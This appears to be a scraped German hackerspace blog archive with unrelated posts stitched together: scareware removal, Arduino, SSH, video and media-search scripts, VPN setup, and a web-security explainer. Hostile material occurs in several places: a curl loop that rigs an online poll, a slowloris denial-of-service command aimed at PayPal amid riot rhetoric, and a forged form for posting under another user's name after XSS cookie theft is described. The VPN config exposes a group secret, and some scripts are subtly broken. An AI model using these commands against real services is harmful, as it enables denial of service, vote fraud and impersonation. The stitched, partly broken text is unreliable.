Wir haben auf- und umgeraeumt. Dazu gekommen ist ein Tisch mit 2 Arbeitsplaetzen. Super zum Basteln und Loeten. Der Makerbot hat auf dem neuen Tisch auch einen Platz gefunden. Gewichen ist dafuer eins der beiden Sofas... genug gechillt. Auf dem Whiteboard gibts ne Todo Liste mit Ranking der einzelnen Punkte, tragt ruhig was drauf ein.

Wir laden auch nochmal ausdruecklich alle ein, die gern mal ein wenig mit Technik experimentieren wollen. Wir haben Loetzeug und einige Bauteile. Werkzeug ist auch vorhanden. Es gibt jede Menge alter Hardware zum verbasteln und einen 3D-Drucker. Auch fuer Softwareexperimente steht bei uns einiges bereit. Insgesamt 4 Laufende Maschinen mit  verschiedenen Linux Distros und einem Windowssystem wollen genutzt werden.

Wenn das alles gut klingt, ihr aber keine Ahnung habt, wovon ich rede, kommt ruhig vorbei, wir teilen unser Wissen gerne. Wenn ihr Ahnung habt, kommt rum und gebt uns davon was ab.

Also die Version die gleich auf zwei Rechnern bei uns eintrudelte, schaffte es (oh welche Überraschung) sich an AntiVir vorbei zu mogeln. Auch die kostenpflichtige Version von Kaspersky musste erst mit der Nase drauf gestupst werden, bis sie registrierte, dass das Stückchen Malware nichts auf der Maschine zu suchen hat. Aber im Grunde kein Problem, der "Trojaner" bzw. die Malware lies sich relativ leicht entfernen.
Da ich im Netz keine Anleitung gefunden habe, die ihn so entfernt schreibe ich einfach zwei drei Zeilen dazu und vielleicht ist es mal irgendwem nützlich.

Als erstes ist es wohl doch sinnvoll im abgesicherten Modus zu starten. Allerdings hatte ich auf einen der Zwei Rechner auch Erfolg das Browserfenster mit mehrmaligen  "Alt+F4" zu beenden. Und konnte danach zumindest im Explorer ein bisschen auf Datei-Suche gehen. Im Abgesicherten Modus dürfte dies auf jeden Fall gehen. How ever.

1. Schritt
Erster Anhaltspunkt sollte sein:

C:\User\[Benutzername]\AppData\Local\Temp\

Hier sollte sich eine "komisch" benannte .exe-Datei finden lassen. Falls nicht, auf Nummer sicher gehen und unter Ordneroptionen "Versteckte und Systemdateien anzeigen" einstellen.
konkretes Beispiel, könnte dann so aussehen:

C:\User\HansWurst\AppData\Local\Temp\

Beispiel der exe:

0.89965784.exe

Den Namen der exe sollte man sich irgndwo notieren bevor man die Datei löscht sonst sucht man eventuell die Nadel im Nadelhaufen. Nachdem notieren die Datei einfach löschen und den Papierkorb leeren.

2. Schritt
Leider reicht das noch nicht aus, aber jetzt wissen wir ja, wonach wir suchen müssen.
jetzt unter Start bei Ausführen einfach "cmd" eingeben und in der sich öffnenden Konsole "regedit" eingeben. (Vielleicht geht auch gleich bei Ausführen/Suchen "regedit", ich weiß es nicht genau, da ich selbst kein Windows 7 benutze)

In der Registry geben wir dann in der Suche den Name unserer .exe-Datei ein. Hier im Beispiel "0.89965784.exe" oder nur "0.89965784". Die Suche dürfte dann ein passendes Ergebnis liefern, dieser Eintrag sollte dann aus der Registry entfernt werden.

3. Schritt
Prinzipiell, kann jetzt schon nichts mehr geschehen. Allerdings wird Windows beim starten wohl jetzt eine Fehlermeldung bringen, dass die auszuführende Datei nicht mehr vorhanden ist (in dem Falle die Datei des Trojaners). Um dies zu verhindern, müssen wir nun noch aus dem Startup die entsprechende .rundll-Datei entfernen. Diese finden wir unter:

C:\Users\[Benutzername]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

konkretes Beispiel könnte dann so aussehen:

c:\Users\HansWurst\AppData\Roaming\Microsoft\Start Menu\Programs\Startup

in dem Ordner Startup sollte sich dann eine .rundll finden lassen, die dem Namen unserer .exe-Datei entspricht. Diese sollte ebenfalls gelöscht werden.

Mit dem letzten Schritt sollte alles entfernt sein. Natürlich ist es sinnvoll nachdem noch einmal den Viren-/Malwarescanner zu aktualisieren und nochmal über die Platte zu jagen. Eine Neuinstallation des Betriebssystems sehe ich einfach nicht. Zumal der "Trojaner" meines Wissens nach auch keinen weiteren Schaden anrichtet außer beim Start das Browserfenster aufzurufen welches den User auffordert Geld zu überweisen. Sprich eigentlich ist es gar kein Trojaner sondern eher Scamware oder Scareware.

WICHTIG: Checkt noch ob euer Taskmanager funktioniert. Wenn dieser nicht auftaucht oder nicht startet dann ist doch noch ein letzter Schritt erforderlich:
1. Unter Start im Suchefeld wieder regedit eingeben.
2. Unter HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies System "öffnen"
3. Den Eintrag DisableTaskMgr suchen und öffnen und den Wert auf 0 setzten. Dann ok und prüfen ob der Taskmanager jetzt wie gewohnt erscheint.

Eventuell reiche ich eine genauere Anleitung nach, wenn ich Zeit und Ruhe dazu finde. Ansonsten sind wir für alle Hinweise und Verbesserungsvorschläge sowie Fehlerkorrekturen offen.

CODE:

#if defined(ARDUINO) && ARDUINO > 18
#include <SPI.h>
#endif
#include <Ethernet.h>
#include <EthernetDNS.h>
#include <EthernetDHCP.h>
#include <Twitter.h>

byte mac[] = { 0xDE, 0xAD, 0xBE, 0xEF, 0xFE, 0xED };
const char* ip_to_str(const uint8_t*);
int state = 1; //door will be open at boot!!!
int sensorValue = 0;

Twitter twitter("your-token-here");

void setup() {
  Serial.begin(9600);
  network();
}

void network() {
  Serial.println("attempting to obtain DHCP lease...");
  EthernetDHCP.begin(mac);

  const byte* ipAddr = EthernetDHCP.ipAddress();
  const byte* gatewayAddr = EthernetDHCP.gatewayIpAddress();
  const byte* dnsAddr = EthernetDHCP.dnsIpAddress();
 
  Serial.println("DHCP lease has been obtained.");

  Serial.print("IP address is ");
  Serial.println(ip_to_str(ipAddr));
 
  Serial.print("gateway IP address is ");
  Serial.println(ip_to_str(gatewayAddr));
 
  Serial.print("DNS IP address is ");
  Serial.println(ip_to_str(dnsAddr));
}

// Just a utility function to nicely format an IP address.
const char* ip_to_str(const uint8_t* ipAddr) {
  static char buf[16];
  sprintf(buf, "%d.%d.%d.%d", ipAddr[0], ipAddr[1], ipAddr[2], ipAddr[3]);
  return buf;
}

void loop() {
  door_status();
  EthernetDHCP.maintain();
  randomSeed(millis());
}

void door_status() {
  int sensorValue = analogRead(A0);
  Serial.println(sensorValue);
 
  if(sensorValue>915 && state==1){
    delay(3000);
    int sensorValue = analogRead(A0);
    if(sensorValue>915 && state==1){
      delay(3000);
      int sensorValue = analogRead(A0);
      if(sensorValue>915 && state==1){
        state=0;
        tweet(state);
      }
    }
  }
  if(sensorValue<916 && state==0) {
    delay(3000);
    int sensorValue = analogRead(A0);
    if(sensorValue<916 && state==0) {
      delay(3000);
      int sensorValue = analogRead(A0);
      if(sensorValue<916 && state==0) {
        state=1;
        tweet(state);
      }
    }
  }
  //update margin
  delay(10000);
}

void tweet(int state) {
  if(state==1) {
    
    int rand = random(5000);
    char txt [120];
    sprintf(txt, "der maschinenraum ist offen No. %d", state);
    
    Serial.println("connecting to twitter...");
    if (twitter.post(txt)) {
      int status = twitter.wait();
      if (status == 200) {
        Serial.println("status tweet OPEN sent.");
      } else {
        Serial.print("tweet failed : code ");
        Serial.println(status);
      }
    } else {
    Serial.println("connection to twitter failed.");
    setup();
    }
    
  }  
 
  if(state==0) {
    
    int rand = random(5000);
    char txt [120];
    sprintf(txt, "der maschinenraum ist geschlossen No. %d", state);
    
    
    Serial.println("connecting to twitter...");
    if (twitter.post(txt)) {
      int status = twitter.wait();
      if (status == 200) {
        Serial.println("status tweet CLOSED sent.");
      } else {
        Serial.print("tweet failed : code ");
        Serial.println(status);
      }
    } else {
    Serial.println("connection to twitter failed.");
    setup();
    }
  }
}

Soweit zum Thema. Bleibt "unconference" zu klären. Die Wikipedia meint zu dem Format: "there is no agenda until... the attendees made one up." Sprich: Wer von den Anwesenden eine Diskussionsrunde, einen Workshop leiten oder einen Vortrag geben möchte sei dazu aufgerufen, genau das zu tun. (Vorträge sollten ca. 20 Minuten lang sein, damit Platz für Fragen und Diskussion bleibt)
Dass das Konzept funktioniert zeigen z.B. das EduCamp und das UXCamp Europe.

Also: kommet zahlreich, bringt Ideen mit.

UPDATE:

Wir freuen uns ankündigen zu dürfen, dass Prof. Dr. Bernhard Klein gegen 11 Uhr einen Vortrag über "usability in urban design" halten wird. Auch Prof. Jay Rutherford ist mit dabei.

UPDATE 2:

...und trägt um 14:00 zu "Core Competencies in Information Design" vor.

Anmeldung, Fragen:   wud@m18.uni-weimar.de

Die wichtigsten Infos gibts hier.

Welche Möglichkeiten hat man nun aber,wenn man den Zugang nur aus einem exklusiven Subnet ermöglichen möchte? Z.B. der eines Intranet wie 192.168.1.0/24 oder bspw. dem Subnet des SCC 141.54.0.0/16.

Dafür muss die PAM-Konfiguration für SSH unter /etc/pam.d/sshd angepasst werden:

account    required    pam_access.so

Danach können unter /etc/security/access.conf verschiedenste Regeln definiert werden. Von wo, wie und auf welchem Terminal sich ein User anmelden darf wird dort reglementiert.

In der Frage nach zulässigen Netzen von denen aus man sich verbinden möchte, sieht eine mögliche Regel für access.conf nun wie folgt aus:

+ : ALL : 141.54.0.0/16 192.168.1.0/24
- : ALL : ALL

usage:

$ youtube-dl-agent http://www.youtube.com/watch?v=Qpwj5k0zYDs \
http://www.youtube.com/watch?v=XCyXY4jLxo8 \
http://www.youtube.com/watch?v=BwJUV8vvGyA \
http://www.youtube.com/watch?v=xQuyiMravE4 \
--output="Weimar nach der Wende.avi"

#!/bin/bash

case "$1" in

  "" )
      exit $E_PARAM ;
  ;;

  * )
    TEMPPATH=$PWD"/youtube-dl-agent.swap/";
    mkdir $TEMPPATH;
    cd $TEMPPATH;

    for i in "$@"
    do
      case "$i" in
        http://* )
            URL=`echo $i`;
            echo " * * * "$URL" * * *";

            ###
            # DOWNLOAD FLV WITH YOUTUBE-DL
            /usr/local/bin/youtube-dl -t $URL

            ###
            # FIND DOWNLOADED FLV FILE BY ID
            ID=`echo $URL | /bin/sed -r 's/.*v=(.*)$/\1/'`;
#            echo $ID;
            IDS=$IDS$ID" ";

            FLV=`/usr/bin/find $PWD"/" -maxdepth 1 -name "*$ID.flv"`;
#            echo $FLV;
            FLVS=$FLVS$FLV" ";

            ###
            # COVERT FLV TO AVI
            /usr/bin/ffmpeg -i $FLV -vcodec copy \
            -acodec libmp3lame -ab 128k $FLV".avi"

            AVI=`/usr/bin/find $PWD"/" -maxdepth 1 \
            -name "*$ID*.avi"`;
#            echo $AVI
            AVIS=$AVIS$AVI" ";
        ;;

        # STRINGS WITH WHITESPACES HAVE TO BE
        # ENCAPSULATE WITH DOUBLE QUOTES
        --output=* )
            OUTPUT=`echo $i | sed 's/--output=//'`;
        ;;

        * )
            exit $E_PARAM ;
        ;;

      esac
    done
  ;;

esac

###
# MERGE SPLIT AVIS
/usr/bin/mencoder -ovc copy -oac copy $AVIS -o $OUTPUT

###
# MOVE FROM TEMP-DIR TO $USERS PWD
/bin/mv -v $OUTPUT ..

###
# CLEAN UP
/bin/rm -rv $TEMPPATH

exit 0

ed@mediathek:~$ cat manipulatevote
#!/bin/bash
while true;
do curl
-F "chosenanswer=4" \
-F "poll_id=355599" \
-A 'Mozilla/4.0'

http://www.snappoll.com/act_vote.php;

sleep 2; done

habe ICH sicherlich nicht so abgespeichert! als das script zwischendurch mal einen fehler warf und ich es neu starten musste, haette ich eigentlich stutzig werden muesen. niemanden kann man hier mehr trauen!

WIR WERDEN ALLE STERBEN!!!!!11111 LOL?!

Wenn ihr jetzt denkt, wir seien nicht mehr als digitale Punks, die euch den Stern vom Benz reizen, dann irrt ihr.
Wir penetrieren lieber euer Finanzsystem, denn wir sind Hacker und wir haben Waffen hier!

Start the Riot! wird dan nicht nur als Hommage an den Moment, waehrend der morgentlichen After-Revolution-Hour laufen,
sondern da wir uns unseres Sieges so sicher sind, bereits am Vorabend der Revolution zum Warm-Up.

Das ist nur der Anfang!
Und wenn dann euer letzter Ausweg, der von euch legitimierte Gebrauch der Dienstwaffe ist, dann artikuliert sich die Gewalt der Atari Teenage Generation nicht mehr nur in Chiptunes, davor lasst euch warnen!

Daher an alle:

Vorwärts, denn wir müssen hier raus!
Zusammen, denn allein machen sie Dich ein!
Voller Zuversicht, denn die letzte Schlacht gewinnen wir!

Anmerkung: Das muss so klingen, sonst hat das keinen Stil ;)

/usr/bin/perl -w ./slowloris.pl \
  -dns www.paypal.com\
  -port 443 \
  -timeout 90 \
  -num 10000 \
  -https

internet elite style

IMMA CHARGIN MAH LAZOR? LOIC!!!1

Terence McKenna

ed@mediathek:~$ find Media/Movies/ -name "*.nfo" -print0 | \
  xargs -0  egrep -i -c -e "countr.*dd|genre.*sci-fi|year.*196" | \
  grep ":3" | sort | sed 's/:3//'
Media/Movies/Der Schweigende Stern (1960)/\
  Der Schweigende Stern (1960).nfo
Media/Movies/First Spaceship on Venus (1962)/\
  First Spaceship on Venus (1962).nfo

und bevor ich das rausfand wurde mir im irc noch gesagt, ich koennte keine scheisse aufpolieren und solle das lieber in perl oder besser noch in python programmieren! und am ende habe ich es doch in einem one-liner untergebracht :P

damit das auch nachhaltig ist und benutzbar bleibt, habe ich mir das ziel gesetzt, nun auch in der bash das interface zuprogrammieren. nach ganz viel case-voodoo wird am ende auch nur wieder

 /usr/bin/find $DIR -type f -name "*.nfo" -print0 | \
  xargs -0 egrep -c -i -e "$EXPRESSION" | \
  grep ":$COUNTER" | sort | \
  sed 's/:'$COUNTER'//' | sed -r 's/^.*\/(.*)\/.*/\1/'

ausgefuehrt. in der benutzung sieht das dann z.b. so aus:

ed@mediathek:~$ mediathek-cli-search --country=dd --genre=sci-fi \
  --year=196
Der Schweigende Stern (1960)
First Spaceship on Venus (1962)

# link zum source von extern und von intern

die man-page und die bash-completion bau ich dann morgen oder so...

ed@mediathek:~$ mediathek-cli-search
USAGE:
 mediathek-cli-search [OPTION=VALUE]...

OPTIONS:
 --help
 --title
 --orignaltitle
 --alternativetitle
 --englishtitle
 --germantitle
 --year
 --country
 --director
 --genre
 --length
 --dub
 --sub
 --subfiles
 --source
 --videoformat
 --resolution
 --aspectratio

EXAMPLES:
 mediathek-cli-search --help=OPTION
 mediathek-cli-search --country=dd --genre=sci-fi
 mediathek-cli-search --country=jp --genre=action \
   --year=199
 mediathek-cli-search --director=vertov
 mediathek-cli-search --dub=en --subfiles=de \
   --genre=horror

mr@mediathek:~$ find Media/Movies/ -name "*.nfo" -print0
| xargs -0  egrep -i -l "country.*dd" | sort

schon echt weit. aber wie ich das ergebniss nochmal durch

egrep -i -l "genre.*sci-fi" | sort

schubse ist mir unklar.
versuche das durch weitere pipes zu quetschen z.B. mit

find -exec

oder

xargs

-voodoo haben kein akzeptables bis gar kein ergebniss geliefert, oder sind wie z.b.

grep -B 60 -A 60

einfach hinrissig... hat jemand ein vorschlag wie ich mit grep zwei und mehr strings in verschiedenen zeilen durch binaere-operatoren verbinden kann?

the revolution will be thimbled!

ed@mediathek:/usr/local/bin/Thimbl-CLI$ ./thimbl fetch
Fingering  dk@telekommunisten.org
Fingering  meschugge@ping01.stura.uni-weimar.de
finger: connect: Connection refused *
Failed on address. Skipping
Finished
ed@mediathek:/usr/local/bin/Thimbl-CLI$ ./thimbl print
ed@ping01.stura.uni-weimar.de
2010-11-19 12:10:04
es lebe die maschine der teleanarchistischen revolution\!

dk@telekommunisten.org
2010-11-05 12:44:12
Hey @mark, this is the first update sent with Thimbl-CLI

dk@telekommunisten.org
2010-07-07 12:51:20
mike needs to stop sending messages from the future!

dk@telekommunisten.org
2010-07-07 12:21:40
#thimbl is rolling!

dk@telekommunisten.org
2010-06-22 17:09:14
I love thimbl! #thimbl

* living in the shadow of a router sux :(

Zu allererst brauchen wir den vpnc.

sudo pacman -S vpnc

Dann gehts in die config von vpnc. Die liegt in /etc/vpnc/default.conf

# example vpnc configuration file
# see vpnc --long-help for details

#Interface name tun0
#IKE DH Group dh2
#Perfect Forward Secrecy nopfs

# You may replace this script with something better
#Script /etc/vpnc/vpnc-script
# Enable this option for NAT traversal
#UDP Encapsulate

IPSec gateway 172.18.254.252
IPSec ID GROUP-WLAN
IPSec secret v2oeff
Xauth username DEINNUTZER
Xauth password DEINPW

Da in der config dein vpn passwort plaintext liegt, kannst du zumindest mit chmod die rechte aendern, sodass nur root das file lesen kann.

chmod 700 /etc/vpnc/default.conf

Jetzt koennt ihr euch ins uni wlan einloggen und vpnc ausfuehren.

sudo vpnc

Weil ich ein fauler mensch bin und auf networkmanager stehe... gibs dazu auch noch was auf die augen:

Wicd haelt hierfuer die moeglichkeit bereit scripts fuer jede einzelne verbindung auszufuehren. Es gibt pre- und post connection scripts und pre- und post disconnection scripts. Weil wir nach dem connecten zum uni wlan vpnc ausfuehren wollen erstellst du dir /etc/wicd/scripts/postconnect/uniwlan.sh mit folgenden inhalt:

#!/bin/bash

script="$(basename "$0")"
script_name="${script/.sh/}"

echo "Running ${script}" >"/var/log/wicd/${script_name}.log"
exec 2>>"/var/log/wicd/${script_name}.log"
exec 1>&2

connection_type="$1"
echo "Connection type: ${connection_type}"

if [ "${connection_type}" == "wired" ]; then
profile="$3"
echo "Profile: ${profile}"
elif [ "${connection_type}" == "wireless" ]; then
essid="$2"
bssid="$3"
echo "ESSID: ${essid}"
echo "BSSID: ${bssid}"
else
echo "Unknown connection type: ${connection_type}" >&2
exit
fi

if [ "${essid}" == "WLAN-BUW" ]; then
killall vpnc
vpnc

else
exit
fi

Das killall vpnc ist nur ein reset,  falls da noch reste aus ner andern verbindung laufen... das else exit ist eventuell auch redundant... aber sicher ist sicher.

Wenn ihr aus dem uni wlan zu einem anderen netzwerk wechselt sollte natuerlich der vpnc wieder gekillt werden. Deshalb gibts /etc/wicd/scripts/postdisconnect/uniwlan.sh

#!/bin/bash

script="$(basename "$0")"
script_name="${script/.sh/}"

echo "Running ${script}" >"/var/log/wicd/${script_name}.log"
exec 2>>"/var/log/wicd/${script_name}.log"
exec 1>&2

connection_type="$1"
echo "Connection type: ${connection_type}"

if [ "${connection_type}" == "wired" ]; then
profile="$3"
echo "Profile: ${profile}"
elif [ "${connection_type}" == "wireless" ]; then
essid="$2"
bssid="$3"
echo "ESSID: ${essid}"
echo "BSSID: ${bssid}"
else
echo "Unknown connection type: ${connection_type}" >&2
exit
fi

killall vpnc
fi

There u have it... vergesst nicht die wicd scripts ausfuehrbar zu machen.
Ergebniss: Verbinden zum uniwlan incl. vpn mit einem click... bzw bei auto-connect total automatisiert und es ist nicht noetig dein pw einzutippen.

Hier nun ein kleiner Erklärbär-Post zur Pinnwand-Sicherheit und ein wenig Web-Security im Allgemeinen:

Disclaimer: Die Informationen dazu sind seit Jahren bekannt und niemand möchte der Universität schaden oder hat wirklich Cookies geklaut. Es ist aber teilweise einfach zu einfach und viele Fehler tauchen im Netz immer wieder auf oder man begeht sie selbst wenn man Webseiten bastelt (ist immer einfacher als man denkt ;)

Daher hier einmal die beiden (bislang bekannten und bereits gefixten) Bugs in der Piazza etwas erklärt:

Bug #1: HTML-Injection

Möglich geworden ist dies durch eine XSS-Lücke. Der Titel eines Beitrages wurde auf der Übersichtsseite nicht korrekt escaped. ¹

Das klingt auf den ersten Blick recht harmlos. In Verbindung mit JavaScript ergeben sich aber unendlich viele Möglichkeiten Spass zu haben oder eben auch "böse" Dinge zu tun. Mit JavaScript hat man Zugriff auf den kompletten DOM einer Website und kann normalerweise ² auch Cookies auslesen oder Asteroids mit den Elementen der Website spielen ³.

Cookies sind vor allen Dingen interressant, weil damit Sessions authentizifiert werden. Wer es noch nicht kennt: Firesheep demonstriert recht beeindruckend, dass man oft nur den Cookie stehlen muss um eine Session zu stehlen.

Zum Glück hat das SCC seine Hausaufgaben hier gemacht und das Vorlesungsverzeichnis (mit den Noten der Studenten) nutzt httponly-Cookies ² und ist damit (mit modernen Browsern) nicht angreifbar. Aber das TYPO3-Backend der Uni nutzt diese z.B. nicht.

Wie würde denn ein Angreifer mit bösen Absichten Session-Cookies stehlen?

Hier hilft wieder JavaScript. Cookies und JavaScript haben 2 verschiedene Sicherheitskonzepte. JavaScript hat eine sog. Same-Origin-Policy. D.h. man hat nur Zugriff auf Objekte der Domain in der das JavaScript ausgeführt wird.

Cookies haben zusätzlich zur Same-Origin-Policy noch einen Cookie-Path d.h. der Browser sendet nur Cookies an eine bestimmte Unterseite, wenn diese im Cookie-Path steht.

Dank JavaScript ist es aber kein Problem dies zu umgehen:

Man muss nur die Seite von der man die Cookies stehlen möchte in einen z.B. 1x1 Pixel großen <iframe> öffnen und kann dann über die JavaScript Funktion document.cookie den gewünschten Session-Cookie auslesen und unbemerkt weiterleiten.

Damit ist es dem Angreifer dann möglich sich als User zu authentifizieren.

Um das mal am Beispiel der Pinnwand zu illustrieren:

Person XY ist im TYPO3-Backend der Universtät eingeloggt und besucht die Pinnwand-Seite, dort ist ein verstecktes JavaScript in einer Nachricht, welches die TYPO3-Seite im Browser von Person XY in einem unsichtbaren (oder sehr kleinen) <iframe> öffnet, den Session-Cookie stielt und an den Angreifer weiterleitet.

Dieser kann sich nun selbst im TYPO3 einloggen in dem er den Cookie in seinen Browser einträgt.

Bug #2: Authentifizierung umgehen

Bis vor 3 Wochen konnte man ohne Passwort-Abfrage und ohne Freischaltung unter jeden Namen auf der Pinnwand Beiträge verfassen.

Die XSS-Lücke hat die Neugier geweckt und man kann sich ja mal den HTML-Quellcode ansehen und beobachten wie die Pinnwand funktioniert.... erstaunliches trat zu Tage:

Zur Erklärung: Dinge die man in Browser-Eingabekästchen eintippt werden gewöhnlich durch <form> und <input> Tags beschrieben. Beim Klick auf "Beitrag veröffentlichen" sendet der Browser in einen POST-Request die Daten an die URL die in dem Form-Tag angeben ist.

Auf der "Beitrag-Verfassen"-Seite wurde schon immer ein ein Passwort mitgesendet und überprüft. So weit so gut...

Nach der Verfassen-Seite kommt die Vorschau-Seite. Dort gibt gab es wieder ein Formular welches abgeschickt wird:


<form method="post"
action="https://www.uni-weimar.de/cms/index.php?id=2456" id="insert"
accept-charset="ISO-8859-1, ISO-8859-2">
<fieldset>
<input type="hidden" name="user" value="HIER EINEN
UNI-LOGIN EINTRAGEN">
<input type="hidden" name="titel" value="Titel des Posts">
<input type="hidden" name="inhalt"
value="Inhalt+vom+Post+urlencoded" />
<input type="hidden" name="datum" value="2010-10-20">
<input type="hidden" name="zeit" value="14:30:00">
<input type="hidden" name="dauer" value="1h">
<input type="hidden" name="intern" value="">
<input type="hidden" name="gast" value="">
<input type="hidden" name="pin_rubrik" value="11">
<input type="submit" value="Beitrag veröffentlichen"
name="insert">
</fieldset>
</form>


Na - fällt etwas auf? Hier gibt gab es kein Passwort-Feld. Und die URL an welche die Daten gesendet werden ist auch eine andere.

Blöd nur, dass HTTP zustandslos ist. Dementsprechend interressiert es weder den Browser noch die Website ob man sich vorher schon erfolgreich authentifiziert hat...

...basteln wir uns also eine kleine HTML-Datei, welche die Daten hinschickt und ändern wir den Eintrag im user=-Feld.

Huch. Da ist ein neuer Beitrag auf der Piazza ohne Passwortabfrage von einer anderen Person. In das Feld für den Namen konnte man eintragen was man möchte.

Jetzt können wir also alle unliebsamen Vorlesungen absagen und in Bernds Namen trollen. m(

Wer selbst eine Lücken finden sollte: Bitte der SCC Security Hotline melden: security@scc.uni-weimar.de. Die kümmern sich dann darum.

Und hier gibt es einen gutes Tutorial zur Sicherheit von Web-Anwendungen.

Anmerkungen

[1] Escaping ist das Umwandeln von Sonderzeichen wie < > in entsprechende HTML-Codes, so dass der Browser sie nicht mehr ausführt. In PHP z.B. mit htmlspecialchars() machbar.

[2] Da es das Problem des Cookie-Diebstahls schon sehr lange gibt wurde mit Internet Explorer 6 SP1 (2002) das httponly-Flag eingeführt. Damit wird verhindert, dass JavaScript- sowie AJAX-Funktionen Zugriff auf derart gesicherte Cookies haben.

[3] Einfach das Codeschnippsel in die Adresszeile kopieren mit den Pfeiltasten navigieren und mit der Leertaste ballern:

javascript:var%20s%20=%20document.createElement('script');
s.type='text/javascript';document.body.appendChild(s);
s.src='http://erkie.github.com/asteroids.min.js';void(0);


bei der gelegenheit wollte ich eigentlich auf 'wir. variante eines manifestes' von vertov linken, aber hab auf die schnelle nichts online gefunden. da ich das buch aber eh scannen muss, kann ich bald nachliefern...

in der zwischen zeit habe ich das hier fuer euch: we are the future cunt